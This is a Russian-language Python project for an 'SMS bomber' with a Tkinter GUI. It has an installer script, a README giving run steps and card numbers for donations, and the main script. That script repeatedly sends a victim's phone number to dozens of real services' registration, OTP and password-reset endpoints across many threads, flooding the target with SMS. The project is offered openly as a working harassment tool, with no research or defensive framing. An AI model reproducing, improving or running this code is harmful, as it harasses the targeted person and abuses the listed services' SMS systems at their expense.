├── Install.py
├── README.md
├── HZF Bomber V1.4.pyw
└── LICENSE
/Install.py:
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1 | import os
2 |
3 | print("Установка библиотек")
4 | os.system("pip3 install --upgrade pip")
5 | bib = ["tk", "colorama", "bs4", "termcolor", "Label", "colored", "requests"]
6 | for i in range(len(bib)):
7 | print("Установка "+bib[i]+"...\033[0m")
8 | os.system("pip3 install "+bib[i])
9 | os.system('clear')
10 | print("Установка завершена!")
11 |
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/README.md:
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1 | [](https://www.youtube.com/@avencores/) [](https://t.me/avencoresyt) [](https://vk.com/avencoresvk)
2 |
3 | # Установка
4 | * Скачиваем архив
5 | * Распаковываем в удобную нам директорию
6 | * Запускаем Terminal
7 | * Переходим в корень с бомбером
8 | * Запускаем установку доп. компонентов: **python Install.py**
9 |
10 | # Запуск
11 | * Вводим в Terminal: **python "HZF Bomber V1.4.pyw"**
12 |
13 | # Важная информация
14 | * Бомбер работает только на Windows и Linux
15 |
16 | # Меню
17 |
18 | 
19 |
20 | ___
21 | # 💰 Поддержать автора
22 | + **SBER**: 2202 2050 7215 4401
23 | + **VTB**: 2200 2404 1001 8580
24 |
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/HZF Bomber V1.4.pyw:
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1 | import requests, random
2 | from requests import get
3 | from bs4 import BeautifulSoup as bs
4 | import colorama
5 | from termcolor import colored
6 | from tkinter import filedialog as fd
7 | from tkinter import *
8 | from tkinter import messagebox
9 | from tkinter import Label
10 | from random import randint
11 | import threading, os, sys, time
12 | colorama.init()
13 | root = Tk()
14 | root.title('SMS BOMBER BY HZF (RUSSIA)')
15 | root.geometry('525x400')
16 |
17 | def good(): # legacy мусор
18 | print(colored('SMS sent', 'green')) # legacy мусор
19 |
20 |
21 | def error(): # legacy мусор
22 | print(colored('SMS not sent', 'red')) # legacy мусор
23 |
24 |
25 | def spamNOproxy(phone):
26 | while True:
27 | _name = ''
28 | for x in range(12):
29 | _name = _name + random.choice(list('123456789qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM'))
30 | password = _name + random.choice(list('123456789qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM'))
31 | username = _name + random.choice(list('123456789qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM'))
32 |
33 | _email = _name + '@gmail.com'
34 | email = _name + '@gmail.com'
35 | _phone = phone
36 | _phone9 = _phone[1:]
37 | _phoneAresBank = '+' + _phone[0] + '(' + _phone[1:4] + ')' + _phone[4:7] + '-' + _phone[7:9] + '-' + _phone[9:11]
38 | _phone9dostavista = _phone9[:3] + '+' + _phone9[3:6] + '-' + _phone9[6:8] + '-' + _phone9[8:10]
39 | _phoneOstin = '+' + _phone[0] + '+(' + _phone[1:4] + ')' + _phone[4:7] + '-' + _phone[7:9] + '-' + _phone[9:11]
40 | _phonePizzahut = '+' + _phone[0] + ' (' + _phone[1:4] + ') ' + _phone[4:7] + ' ' + _phone[7:9] + ' ' + _phone[9:11]
41 | _phoneGorzdrav = _phone[1:4] + ') ' + _phone[4:7] + '-' + _phone[7:9] + '-' + _phone[9:11]
42 | _text = 'Ляля'
43 | phone1 = '+' + phone[0] + ' ' + '(' + phone[1] + phone[2] + phone[3] + ')' + ' ' + phone[4] + phone[5] + phone[6] + '-' + phone[7] + phone[8] + '-' + phone[9] + phone[10]
44 | phone2 = phone[1] + phone[2] + phone[3] + phone[4] + phone[5] + phone[6] + phone[7] + phone[8] + phone[9] + phone[10]
45 | try:
46 | requests.post('https://app.karusel.ru/api/v1/phone/', data={'phone': _phone}, headers={})
47 | good()
48 | except Exception as e:
49 | error()
50 |
51 | try:
52 | requests.post('https://oauth.sovest.ru/oauth/authorize', data={'phone': _phone})
53 | good()
54 | except Exception as e:
55 | error()
56 |
57 | try:
58 | requests.post('https://gorzdrav.org/login/register/sms/send', data={'phone': _phone9})
59 | good()
60 | except Exception as e:
61 | error()
62 |
63 | try:
64 | requests.get('https://www.sportmaster.ru/user/session/sendSmsCode.do?phone=+' + _phone + '&_=1580559110407')
65 | good()
66 | except Exception as e:
67 | error()
68 |
69 | try:
70 | requests.post('https://ctx.playfamily.ru/screenapi/v3/sendsmscode/web/1', data={'phone':_phone, 'password':password})
71 | good()
72 | except Exception as e:
73 | error()
74 |
75 | try:
76 | requests.post('https://my.pozvonim.com/api/v1/auth/send/sms', data={'phone':_phone, 'origin':'https://my.pozvonim.com', 'referer':'https://my.pozvonim.com/register/', 'host':'my.pozvonim.com'})
77 | good()
78 | except Exception as e:
79 | error()
80 |
81 | try:
82 | requests.get(('https://register.sipnet.ru/cgi-bin/exchange.dll/RegisterHelper?oper=9&callmode=1&phone=' + _phone), data={'host':'register.sipnet.ru', 'origin':'https://www.sipnet.ru', 'referer':'https://www.sipnet.ru/register'})
83 | good()
84 | except Exception as e:
85 | error()
86 |
87 | try:
88 | requests.post('https://p.grabtaxi.com/api/passenger/v2/profiles/register', data={'phoneNumber':_phone, 'countryCode':'ID', 'name':'test', 'email':'mail@mail.com', 'deviceToken':'*'}, headers={'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.117 Safari/537.36'})
89 | good()
90 | except Exception as e:
91 | error()
92 |
93 | try:
94 | requests.post('https://youla.ru/web-api/auth/request_code', data={'phone': _phone})
95 | good()
96 | except Exception as e:
97 | error()
98 |
99 | try:
100 | requests.post('https://www.rabota.ru/remind', data={'credential': _phone})
101 | good()
102 | except Exception as e:
103 | error()
104 |
105 | try:
106 | requests.post('https://www.smsint.ru/bitrix/templates/sms_intel/include/ajaxRegistrationTrigger.php', data={'name':_name, 'phone':_phone, 'promo':'yellowforma'})
107 | good()
108 | except Exception as e:
109 | error()
110 |
111 | try:
112 | requests.post('https://www.mvideo.ru/internal-rest-api/common/atg/rest/actors/VerificationActor/getCodeForOtp', params={'pageName':'loginByUserPhoneVerification', 'fromCheckout':'false', 'fromRegisterPage':'true', 'snLogin':'', 'bpg':'', 'snProviderId':''}, data={'phone':'+7 915 3509908', 'g-recaptcha-response':'', 'recaptcha':'on'})
113 | good()
114 | except Exception as e:
115 | error()
116 |
117 | try:
118 | requests.post('https://newnext.ru/graphql', json={'operationName':'registration', 'variables':{'client': {'firstName':'Иван', 'lastName':'Иванов', 'phone':_phone, 'typeKeys':['Unemployed']}}, 'query':'mutation registration($client: ClientInput!) {\n registration(client: $client) {\n token\n __typename\n }\n}\n'})
119 | good()
120 | except Exception as e:
121 | error()
122 |
123 | try:
124 | requests.post('https://api.sunlight.net/v3/customers/authorization/', data={'phone': _phone})
125 | good()
126 | except Exception as e:
127 | error()
128 |
129 | try:
130 | requests.post('https://alpari.com/api/ru/protection/deliver/2f178b17990ca4b7903aa834b9f54c2c0bcb01a2/', json={'client_type':'personal', 'email':_email, 'mobile_phone':_phone, 'deliveryOption':'sms'})
131 | good()
132 | except Exception as e:
133 | error()
134 |
135 | try:
136 | requests.post('https://online.sbis.ru/reg/service/', json={'jsonrpc':'2.0', 'protocol':'5', 'method':'Пользователь.ЗаявкаНаФизика', 'params':{'phone': _phone}, 'id':'1'})
137 | good()
138 | except Exception as e:
139 | error()
140 |
141 | try:
142 | requests.post('https://app-api.kfc.ru/api/v1/common/auth/send-validation-sms', json={'phone': '+' + _phone})
143 | good()
144 | except Exception as e:
145 | error()
146 |
147 | try:
148 | requests.post('https://lenta.com/api/v1/authentication/requestValidationCode', json={'phone': '+' + _phone})
149 | good()
150 | except Exception as e:
151 | error()
152 |
153 | try:
154 | requests.post('https://cloud.mail.ru/api/v2/notify/applink', json={'phone':'+' + _phone, 'api':2, 'email':'email', 'x-email':'x-email'})
155 | good()
156 | except Exception as e:
157 | error()
158 |
159 | try:
160 | requests.post('https://ok.ru/dk?cmd=AnonymRegistrationEnterPhone&st.cmd=anonymRegistrationEnterPhone', data={'st.r.phone': '+' + _phone})
161 | good()
162 | except Exception as e:
163 | error()
164 |
165 | try:
166 | requests.post('https://plink.tech/register/', json={'phone': _phone})
167 | good()
168 | except Exception as e:
169 | error()
170 |
171 | try:
172 | requests.post('http://smsgorod.ru/sendsms.php', data={'number': _phone})
173 | good()
174 | except Exception as e:
175 | error()
176 |
177 | try:
178 | requests.post('https://api.gotinder.com/v2/auth/sms/send?auth_type=sms&locale=ru', data={'phone_number': _phone})
179 | good()
180 | except Exception as e:
181 | error()
182 |
183 | try:
184 | requests.post('https://passport.twitch.tv/register?trusted_request=true', json={'birthday':{'day':15, 'month':12, 'year':1997}, 'client_id':'kd1unb4b3q4t58fwlpcbzcbnm76a8fp', 'include_verification_code':True, 'password':password, 'phone_number':_phone, 'username':username})
185 | good()
186 | except Exception as e:
187 | error()
188 |
189 | try:
190 | requests.post('https://cabinet.wi-fi.ru/api/auth/by-sms', data={'msisdn': _phone}, headers={'App-ID': 'cabinet'})
191 | good()
192 | except Exception as e:
193 | error()
194 |
195 | try:
196 | requests.post('https://eda.yandex/api/v1/user/request_authentication_code', json={'phone_number': '+' + _phone})
197 | good()
198 | except Exception as e:
199 | error()
200 |
201 | try:
202 | requests.post('https://api-prime.anytime.global/api/v2/auth/sendVerificationCode', data={'phone': _phone})
203 | good()
204 | except Exception as e:
205 | error()
206 |
207 | try:
208 | requests.post('https://www.delivery-club.ru/ajax/user_otp', data={'phone': _phone})
209 | good()
210 | except Exception as e:
211 | error()
212 |
213 | try:
214 | requests.post('https://ube.pmsm.org.ru/esb/iqos-phone/validate', json={'phone': _phone})
215 | good()
216 | except Exception as e:
217 | error()
218 |
219 | try:
220 | requests.post('https://youdo.com/api/verification/sendverificationcode/', data={'PhoneE164': _phone})
221 | good()
222 | except Exception as e:
223 | error()
224 |
225 | try:
226 | requests.post('https://www.citilink.ru/registration/confirm/phone/+' + _phone + '/')
227 | good()
228 | except Exception as e:
229 | error()
230 |
231 | try:
232 | requests.post('https://tehnosvit.ua/iwantring_feedback.html', data={'feedbackName':_name, 'feedbackPhone':'+' + _phone})
233 | good()
234 | except Exception as e:
235 | error()
236 |
237 | try:
238 | requests.post('https://mobileplanet.ua/register', data={'klient_name':_name, 'klient_phone':'+' + _phone, 'klient_email':_email})
239 | good()
240 | except Exception as e:
241 | error()
242 |
243 | try:
244 | requests.post('https://protovar.com.ua/aj_record', data={'object':'callback', 'user_name':_name, 'contact_phone':_phone[3:]})
245 | good()
246 | except Exception as e:
247 | error()
248 |
249 | try:
250 | requests.post('https://e-vse.online/mail2.php', data={'telephone': '+' + _phone})
251 | good()
252 | except Exception as e:
253 | error()
254 |
255 | try:
256 | requests.post('https://allo.ua/ua/customer/account/createPostVue/?currentTheme=main¤tLocale=uk_UA', data={'firstname':_name, 'telephone':_phone[2:], 'email':_email, 'password':password, 'form_key':'Zqqj7CyjkKG2ImM8'})
257 | good()
258 | except Exception as e:
259 | error()
260 |
261 | try:
262 | requests.post('https://secure.online.ua/ajax/check_phone/?reg_phone=%2B' + _phone[0:7] + '-' + _phone[8:11])
263 | good()
264 | except Exception as e:
265 | error()
266 |
267 | try:
268 | requests.post('https://707taxi.com.ua/sendSMS.php', data={'tel': _phone[3:]})
269 | good()
270 | except Exception as e:
271 | error()
272 |
273 | try:
274 | requests.post('https://comfy.ua/ua/customer/account/createPost', data={'registration_name':_name, 'registration_phone':_phone[2:], 'registration_email':_email})
275 | good()
276 | except Exception as e:
277 | error()
278 |
279 | try:
280 | requests.post(f"https://www.sportmaster.ua/?module=users&action=SendSMSReg&phone={_phone}", data={'result': 'ok'})
281 | good()
282 | except Exception as e:
283 | error()
284 |
285 | try:
286 | requests.post('https://my.citrus.ua/api/v2/register', data={'email':_email, 'name':_name, 'phone':_phone[2:], 'password':'fgfg', 'confirm_password':'fgfg'})
287 | good()
288 | except Exception as e:
289 | error()
290 |
291 | try:
292 | requests.post('https://www.nl.ua', data={'component':'bxmaker.authuserphone.login', 'sessid':'bf70db951f54b837748f69b75a61deb4', 'method':'sendCode', 'phone':_phone, 'registration':'N'})
293 | good()
294 | except Exception as e:
295 | error()
296 |
297 | try:
298 | requests.post('https://api.gotinder.com/v2/auth/sms/send?auth_type=sms&locale=ru', data={'phone_number': phone})
299 | good()
300 | except Exception as e:
301 | error()
302 |
303 | try:
304 | requests.post('https://api.tinkoff.ru/v1/sign_up', data={'phone': '+' + phone})
305 | good()
306 | except Exception as e:
307 | error()
308 |
309 | try:
310 | requests.post('https://api.mtstv.ru/v1/users', data={'msisdn': phone})
311 | good()
312 | except Exception as e:
313 | error()
314 |
315 | try:
316 | a = requests.get('https://driver.gett.ru/signup/')
317 | requests.post('https://driver.gett.ru/api/login/phone/', data={'phone':phone, 'registration':'true'}, headers={'Accept-Encoding':'gzip, deflate, br', 'Accept-Language':'en-US,en;q=0.5', 'Connection':'keep-alive', 'Cookie':'csrftoken=' + a.cookies['csrftoken'] + '; _ym_uid=1547234164718090157; _ym_d=1547234164; _ga=GA1.2.2109386105.1547234165; _ym_visorc_46241784=w; _gid=GA1.2.1423572947.1548099517; _gat_gtag_UA_107450310_1=1; _ym_isad=2', 'Host':'driver.gett.ru', 'Referer':'https://driver.gett.ru/signup/', 'User-Agent':'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:64.0) Gecko/20100101 Firefox/64.0', 'X-CSRFToken':a.cookies['csrftoken']})
318 | good()
319 | except Exception as e:
320 | error()
321 |
322 | try:
323 | requests.post('https://api.ivi.ru/mobileapi/user/register/phone/v6/', data={'phone': phone}, headers={'Accept-Language':'ru-RU,ru;q=0.8,en-US;q=0.5,en;q=0.3', 'Connection':'keep-alive', 'Host':'api.ivi.ru', 'origin':'https://www.ivi.ru/', 'Referer':'https://www.ivi.ru/profile'})
324 | good()
325 | except Exception as e:
326 | error()
327 |
328 | try:
329 | b = requests.session()
330 | b.get('https://drugvokrug.ru/siteActions/processSms.htm')
331 | requests.post('https://drugvokrug.ru/siteActions/processSms.htm', data={'cell': phone}, headers={'Accept-Language':'en-US,en;q=0.5', 'Connection':'keep-alive', 'Cookie':'JSESSIONID=' + b.cookies['JSESSIONID'] + ';', 'Host':'drugvokrug.ru', 'Referer':'https://drugvokrug.ru/', 'User-Agent':'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:64.0) Gecko/20100101 Firefox/64.0', 'X-Requested-With':'XMLHttpRequest'})
332 | good()
333 | except Exception as e:
334 | error()
335 |
336 | try:
337 | rutaxi = requests.post('https://moscow.rutaxi.ru/ajax_keycode.html', data={'l': phone[1:]})
338 | good()
339 | except Exception as e:
340 | error()
341 |
342 | try:
343 | rutube = requests.post('https://rutube.ru/api/accounts/sendpass/phone', data={'phone': '+' + phone})
344 | good()
345 | except Exception as e:
346 | error()
347 |
348 | try:
349 | psbank = requests.post('https://ib.psbank.ru/api/authentication/extendedClientAuthRequest', json={'firstName':'Иван', 'middleName':'Иванович', 'lastName':'Иванов', 'sex':'1', 'birthDate':'10.10.2000', 'mobilePhone':phone[1:], 'russianFederationResident':'true', 'isDSA':'false', 'personalDataProcessingAgreement':'true', 'bKIRequestAgreement':'null', 'promotionAgreement':'true'})
350 | good()
351 | except Exception as e:
352 | error()
353 |
354 | try:
355 | beltelecom = requests.post('https://myapi.beltelecom.by/api/v1/auth/check-phone?lang=ru', data={'phone': phone})
356 | good()
357 | except Exception as e:
358 | error()
359 |
360 | try:
361 | modulbank = requests.post('https://my.modulbank.ru/api/v2/registration/nameAndPhone', json={'FirstName':'Саша', 'CellPhone':phone[1:], 'Package':'optimal'})
362 | good()
363 | except Exception as e:
364 | error()
365 |
366 | try:
367 | data = {'form[NAME]':'Иван',
368 | 'form[PERSONAL_GENDER]':'M',
369 | 'form[PERSONAL_BIRTHDAY]':'11.02.2000',
370 | 'form[EMAIL]':'fbhbdfvbd@gmail.com',
371 | 'form[LOGIN]':phone1,
372 | 'form[PASSWORD]':None,
373 | 'get-new-password':'Получите пароль по SMS',
374 | 'user_agreement':'on',
375 | 'personal_data_agreement':'on',
376 | 'formType':'full',
377 | 'utc_offset':180}
378 | aptkru = requests.post('https://apteka.ru/_action/auth/getForm/', data=data)
379 | good()
380 | except Exception as e:
381 | error()
382 |
383 | try:
384 | tvzavr = requests.post('https://www.tvzavr.ru/api/3.1/sms/send_confirm_code?plf=tvz&phone=' + phone + '&csrf_value=a222ba2a464543f5ac6ad097b1e92a49')
385 | good()
386 | except Exception as e:
387 | error()
388 |
389 | try:
390 | cook = requests.post('https://www.netprint.ru/order/profile')
391 | headers = {'Accept':'application/json, text/javascript, */*; q=0.01',
392 | 'Accept-Encoding':'gzip, deflate, br',
393 | 'Accept-Language':'ru-RU,ru;q=0.9,en-US;q=0.8,en;q=0.7',
394 | 'Connection':'keep-alive',
395 | 'Content-Length':145,
396 | 'Cookie':'unbi=' + cook.cookies['unbi'],
397 | 'Host':'www.netprint.ru',
398 | 'Origin':'https://www.netprint.ru',
399 | 'Referer':'https://www.netprint.ru/order/profile',
400 | 'Sec-Fetch-Mode':'cors',
401 | 'Sec-Fetch-Site':'same-origin',
402 | 'User-Agent':'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.97 Safari/537.36 OPR/65.0.3467.48',
403 | 'X-Requested-With':'XMLHttpRequest'}
404 | netprint = requests.post('https://www.netprint.ru/order/social-auth', headers=headers, data={'operation':'stdreg', 'email_or_phone':phonew, 'i_agree_with_terms':1})
405 | good()
406 | except Exception as e:
407 | error()
408 |
409 | try:
410 | requests.post('http://youdrive.today/login/web/phone', data={'phone':phone, 'phone_code':7})
411 | good()
412 | except Exception as e:
413 | error()
414 |
415 | try:
416 | requests.get('https://www.oyorooms.com/api/pwa/generateotp?phone=' + phone + '&country_code=%2B7&nod=4&locale=en')
417 | good()
418 | except Exception as e:
419 | error()
420 |
421 | try:
422 | requests.post('https://api.carsmile.com/', json={'operationName':'enterPhone',
423 | 'variables':{'phone': phone}, 'query':'mutation enterPhone($phone: String!) {\n enterPhone(phone: $phone)\n}\n'})
424 | good()
425 | except Exception as e:
426 | error()
427 |
428 | try:
429 | requests.post('https://api.delitime.ru/api/v2/signup', data={'SignupForm[username]':phone,
430 | 'SignupForm[device_type]':3})
431 | good()
432 | except Exception as e:
433 | error()
434 |
435 | try:
436 | requests.post('https://www.icq.com/smsreg/requestPhoneValidation.php', data={'msisdn':phone,
437 | 'locale':'en', 'countryCode':'ru', 'version':'1',
438 | 'k':'ic1rtwz1s1Hj1O0r', 'r':'46763'})
439 | good()
440 | except Exception as e:
441 | error()
442 |
443 | try:
444 | requests.post('https://terra-1.indriverapp.com/api/authorization?locale=ru', data={'mode':'request',
445 | 'phone':'+' + phone, 'phone_permission':'unknown',
446 | 'stream_id':0, 'v':3, 'appversion':'3.20.6', 'osversion':'unknown',
447 | 'devicemodel':'unknown'})
448 | good()
449 | except Exception as e:
450 | error()
451 |
452 | try:
453 | password = ''.join(random.choice(string.ascii_letters) for _ in range(6))
454 | requests.post('https://lk.invitro.ru/sp/mobileApi/createUserByPassword', data={'password':password, 'application':'lkp', 'login':'+' + phone})
455 | good()
456 | except Exception as e:
457 | error()
458 |
459 | try:
460 | requests.post('https://qlean.ru/clients-api/v2/sms_codes/auth/request_code', json={'phone': phone})
461 | good()
462 | except Exception as e:
463 | error()
464 |
465 | try:
466 | requests.get('https://findclone.ru/register?phone=+' + phone)
467 | good()
468 | except Exception as e:
469 | error()
470 |
471 | try:
472 | requests.post('https://mobile.vkusvill.ru:40113/api/user/', data={'Phone_number':_phone9, 'version':'2'}, headers={})
473 | good()
474 | except Exception as e:
475 | error()
476 |
477 | try:
478 | requests.post('http://taxiseven.ru/auth/register', data={'phone': _phone}, headers={})
479 | good()
480 | except Exception as e:
481 | error()
482 |
483 | try:
484 | requests.post('https://security.wildberries.ru/mobile/requestconfirmcode?forAction=RegisterUser', data={'phone': '+' + _phone}, headers={})
485 | good()
486 | except Exception as e:
487 | error()
488 |
489 | try:
490 | requests.post('https://www.rabota.ru/remind', data={'credential': _phone})
491 | good()
492 | except Exception as e:
493 | error()
494 |
495 | try:
496 | requests.post('https://fastmoney.ru/auth/registration', data={'RegistrationForm[username]':'+' + _phone, 'RegistrationForm[password]':'12345', 'RegistrationForm[confirmPassword]':'12345', 'yt0':'Регистрация'})
497 | good()
498 | except Exception as e:
499 | error()
500 |
501 | try:
502 | requests.post('https://ube.pmsm.org.ru/esb/iqos-reg/submission', json={'data': {'firstName':_text, 'lastName':'***', 'phone':_phone, 'email':_name + '@gmail.com', 'password':_name, 'passwordConfirm':_name}})
503 | good()
504 | except Exception as e:
505 | error()
506 |
507 | try:
508 | requests.post('https://www.smsint.ru/bitrix/templates/sms_intel/include/ajaxRegistrationTrigger.php', data={'name':_text, 'phone':_phone})
509 | good()
510 | except Exception as e:
511 | error()
512 |
513 | try:
514 | requests.post('https://login.mos.ru/sps/recovery/start', json={'login':_phone, 'attr':''})
515 | good()
516 | except Exception as e:
517 | error()
518 |
519 | try:
520 | requests.post('https://lk.invitro.ru/lk2/lka/patient/refreshCode', data={'phone': _phone})
521 | good()
522 | except Exception as e:
523 | error()
524 |
525 | try:
526 | requests.post('https://comfy.ua/ua/customer/account/createPost', data={'registration_name':_name, 'registration_phone':_phone[2:], 'registration_email':_email})
527 | good()
528 | except Exception as e:
529 | error()
530 |
531 | class Queue:
532 |
533 | def __init__(self):
534 | self.queue = []
535 |
536 | def get(self):
537 | if self.qsize() != 0:
538 | return self.queue.pop()
539 |
540 | def put(self, item):
541 | if item not in self.queue:
542 | self.queue.append(item)
543 |
544 | def qsize(self):
545 | return len(self.queue)
546 |
547 | def __str__(self):
548 | return str(self.queue)
549 |
550 | var = IntVar()
551 |
552 | def StartThread():
553 | number = text1.get('1.0', 'end')
554 | try:
555 | thrade = int(text2.get('1.0', 'end'))
556 | except:
557 | messagebox.showinfo(title='Warning', message='Не корректный формат потоков')
558 |
559 | try:
560 | if thrade > 20:
561 | messagebox.showinfo(title='Warning', message='Превышен максимум потоков')
562 | except:
563 | pass
564 |
565 | try:
566 | if len(number) < 12 or file_name == None:
567 | messagebox.showinfo(title='Warning', message='Неправильный формат номера')
568 | else:
569 | messagebox.showinfo(title='Запущено', message='Бомбинг запущен')
570 | for i in range(thrade):
571 | t = threading.Thread(target=spam, args=(number,))
572 | t.start()
573 |
574 | except:
575 | pass
576 |
577 | else:
578 | spam = spamNOproxy
579 | if len(number) < 12:
580 | messagebox.showinfo(title='Warning', message='Неправильный формат номера')
581 | else:
582 | messagebox.showinfo(title='Следи за процессом в Terminal', message='Бомбинг запущен')
583 | for i in range(thrade):
584 | t = threading.Thread(target=spam, args=(number,))
585 | t.start()
586 |
587 |
588 | root.resizable(False, False)
589 |
590 | text1 = Text(root, height=1, width=15, font='Ubuntu')
591 | text1.pack()
592 | text1.place(x=180, y=25)
593 | text2 = Text(root, height=1, width=2, font='Ubuntu')
594 | text2.pack()
595 | text2.place(x=180, y=90)
596 | label1 = Label(text='Введите номер в формате 7XXXXXXXXXX', fg='white', bg='#514E4D')
597 | label1.pack()
598 | label1.place(x=180, y=55)
599 | label2 = Label(text='Потоки (Максимум 20)', fg='white', bg='#514E4D')
600 | label2.pack()
601 | label2.place(x=210, y=90)
602 | poetry = 'Смс бомбер by HZF'
603 | label3 = Label(text=poetry, bg="gray", fg="white", justify=CENTER)
604 | label3.place(x=10, y=370)
605 | poetry = 'Последнее обновление сервисов: 23.04.2021'
606 | label3 = Label(text=poetry, bg="gray", fg="white", justify=CENTER)
607 | label3.place(x=270, y=370)
608 | poetry = 'Последнее обновление бомбера: 23.04.2021'
609 | label3 = Label(text=poetry, bg="gray", fg="white", justify=CENTER)
610 | label3.place(x=270, y=340)
611 | crack = Button(text='Запустить', height=2, width=11, background='green', fg="white", activebackground="red", command=StartThread)
612 | crack.pack()
613 | crack.place(x=200, y=280)
614 | root.mainloop()
615 |
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